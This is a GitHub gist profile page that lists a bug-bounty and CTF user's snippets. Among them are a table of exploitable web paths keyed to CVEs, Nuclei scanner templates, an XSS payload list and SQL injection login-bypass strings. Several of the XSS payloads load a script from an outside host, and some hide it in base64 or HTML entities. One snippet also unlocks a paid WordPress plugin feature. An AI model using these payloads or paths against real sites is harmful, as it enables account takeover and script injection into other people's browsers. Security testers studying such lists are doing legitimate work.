Skip to content

Instantly share code, notes, and snippets.

View hxlxmjxbbxs's full-sized avatar
🚩
CTF

Halim Jabbes hxlxmjxbbxs

🚩
CTF
View GitHub Profile
@hxlxmjxbbxs
hxlxmjxbbxs / exploitable_webpaths.md
Created December 30, 2023 04:12 — forked from kafkaesqu3/exploitable_webpaths.md
easy wins - exploitable/leaky web paths
Exploit/description Path
Microsoft Office Online Server SSRF (relay) /op/view.aspx
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.Ui.WebResource.axd?type=rau
CVE-2017-11317 CVE-2019-18935 /Telerik.Web.UI.DialogHandler.aspx
CVE-2020-17519 /jobmanager/logs/
CVE-2017-7615 /verify.php?id=1&confirm_hash=
CVE-2018-1000130 /jolokia
CVE-2018-1000130 /actuator/jolokia
leak /actuator/env
@hxlxmjxbbxs
hxlxmjxbbxs / subdomain_wordlist.md
Created November 28, 2023 03:37 — forked from cihanmehmet/subdomain_wordlist.md
Subdomain Wordlist
@hxlxmjxbbxs
hxlxmjxbbxs / m2sms
Created November 18, 2023 23:45 — forked from spangey/m2sms
Email to SMS gateways in YAML
config:
from_address: noreply@domain.com
carriers:
alltel:
name: Alltel
value: @message.alltel.com
ameritech:
name: Ameritech
value: @paging.acswireless.com
@hxlxmjxbbxs
hxlxmjxbbxs / allinonemigration.md
Created October 3, 2023 10:23 — forked from giovanni-d/allinonemigration.md
All-in-One WP Migration - Restore From Server (without PRO version) - Restore

All-in-One WP Migration Restore From Server (without pro version)

If you don't want to pay for the PRO version of this plugin, and you want to use the "Restore from Server" functionally that was present in the version 6.77, follow the instructions below:

  1. Open the js file: wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js
  2. On line 1208, replace the code below:
$('.ai1wm-backup-restore').click(function (e) {
@hxlxmjxbbxs
hxlxmjxbbxs / CVE-2023-36845.yaml
Created September 20, 2023 04:15
Nuclei Template For Juniper Networks Junos OS PHP External Variable Modification Vulnerability
id: CVE-2023-36845
info:
name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
author: hxlxmj
severity: medium
description: |
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-36845
@hxlxmjxbbxs
hxlxmjxbbxs / CVE-2023-36845.yaml
Created September 19, 2023 20:58
Vulnerability Scanner for Juniper CVE-2023-36845
id: CVE-2023-36845
info:
name: Juniper Networks Junos OS PHP External Variable Modification Vulnerability
author: hxlxmj
severity: medium
description: |
A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-36845
@hxlxmjxbbxs
hxlxmjxbbxs / xss_payloads.txt
Created September 12, 2023 17:37 — forked from nullenc0de/xss_payloads.txt
XSS_Payloads
"><script src="https://js.rip/t9eoip8zws"></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://js.rip/t9eoip8zws\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL3Q5ZW9pcDh6d3MiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#
@hxlxmjxbbxs
hxlxmjxbbxs / sqli-auth-bypass.txt
Created September 8, 2023 00:35 — forked from spenkk/sqli-auth-bypass.txt
SQL Injection Authentication Bypass payloads
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
@hxlxmjxbbxs
hxlxmjxbbxs / JavascriptRecon.md
Created July 21, 2023 06:20 — forked from fuckup1337/JavascriptRecon.md
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@hxlxmjxbbxs
hxlxmjxbbxs / deobf.cmd
Created April 1, 2023 17:25 — forked from a-sync/deobf.cmd
batch obfuscator / deobfuscator
@echo off & setlocal
if "%~1"=="" exit /b
if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b
<"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1")